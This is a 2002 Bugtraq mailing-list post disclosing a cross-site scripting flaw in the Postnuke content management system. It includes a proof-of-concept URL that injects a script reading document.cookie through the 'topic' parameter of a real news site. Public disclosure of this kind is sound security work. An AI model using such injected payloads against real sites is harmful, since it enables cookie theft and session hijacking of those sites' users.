[27198] in bugtraq
Postnuke XSS issues
daemon@ATHENA.MIT.EDU (Mark Grimes)
Thu Sep 26 15:10:30 2002
Date: Wed, 25 Sep 2002 11:44:56 -0700
From: Mark Grimes <mark@stateful.net>
To: bugtraq@securityfocus.com
Message-ID: <20020925184456.GB5810@stateful.net>
Reply-To: mark@stateful.net
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
I got an awful lot of email from BUGTRAQers saying that the solution
for PHPNUKE's problems is to use Postnuke. This is obviously not
a panacea.
http://news.postnuke.com/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert(document.cookie);</script>
It's obviously apparent that CMS has a long way to go. Godspeed
to those deploying it in production environments. May the force be
with you.
--
Mark Grimes <mark@stateful.net>
Stateful Labs
